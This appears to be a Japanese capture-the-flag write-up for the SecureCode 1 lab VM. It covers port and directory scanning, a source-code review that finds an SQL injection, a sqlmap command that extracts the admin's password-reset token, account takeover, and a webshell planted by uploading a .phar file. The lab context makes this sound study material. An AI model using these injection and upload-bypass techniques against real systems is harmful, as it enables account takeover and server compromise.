SecureCode 1

Recon

nmap

┌──(kali㉿kali)-[~/Documents/securecode]
└─$ nmap -p- --min-rate 10000 192.168.179.129
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-20 07:19 -0500
Nmap scan report for 192.168.179.129
Host is up (0.00011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:99:FC:D3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

Web

Pasted image 20251220212022.png

Directory / File

┌──(kali㉿kali)-[~/Documents/securecode]
└─$ feroxbuster -u http://192.168.179.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 邏                 ver: 2.13.1
───────────────────────────┬──────────────────────
   Target Url            │ http://192.168.179.129/
   In-Scope Url          │ 192.168.179.129
   Threads               │ 50
   Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
   Status Codes          │ All Status Codes!
   Timeout (secs)        │ 7
 說  User-Agent            │ feroxbuster/2.13.1
   Config File           │ /home/kali/.config/feroxbuster/ferox-config.toml
   Extract Links         │ true
   Extensions            │ [zip]
   HTTP methods          │ [GET]
   Recursion Depth       │ 4
───────────────────────────┴──────────────────────
   Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
<SNIP>
200      GET     5780l    35615w  5275298c http://192.168.179.129/source_code.zip

初見でzipを探す頭になれなかったので、普通にこの辺で詰まってた。

Code

zipにはアプリケーションコードが入っている。

Pasted image 20251220225555.png

エスケープはプリペアードステートメントではなく、（仕様はよくわからないが）エスケープ関数に頼っている
idパラメータは'で囲まれていないので、SQLインジェクションに脆弱な状態になっている

当該機能をsqlmapでゴリ押す。テーブル構造はソースコードから分かっている。

Pasted image 20251220225856.png

パスワードリセットの際、このuserテーブルにトークンが書き込まれる。

Pasted image 20251220230016.png

Exploit

ので、userテーブルのadminに発行されているパスワードリセットトークンを得ることで、任意のパスワードに変更できる。

┌──(kali㉿kali)-[~/Documents/securecode]
└─$ sqlmap -r viewItem.php --fresh-queries --dbms=MySQL --code=404 --technique=T --time-sec=1 -D hackshop --sql-query='SELECT token FROM user WHERE id=1'
<SNIP>
[08:53:33] [INFO] fetching SQL SELECT statement query output: 'SELECT token FROM user WHERE id=1'
[08:53:33] [INFO] retrieved: 1
[08:53:34] [INFO] retrieved: whwl1vNGVOJca0z
SELECT token FROM user WHERE id=1: 'whwl1vNGVOJca0z'
[08:54:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.179.129'

このトークンを、doResetPassword.phpに渡すと、パスワードリセットページに行けるので

Pasted image 20251220230624.png

リセットして

Pasted image 20251220230712.png

ログインする。

Pasted image 20251220230729.png

Congrats, FLAG1: 0410e2bd77f66dc9a567ab00aa29599cd

ファイルアップロードがあるが.phpは通らないので、.pharを使ってwebshellを設置する。

Pasted image 20251220231535.png

Pasted image 20251220231549.png

よしなに、対象ファイルを見つける。

Pasted image 20251220231809.png

legendary

FLAG2: 3599f5effdb3ed07d9a90a4ed19d13ad4

ZIP見つけるところが若干エスパー味ある...？そんなもんか...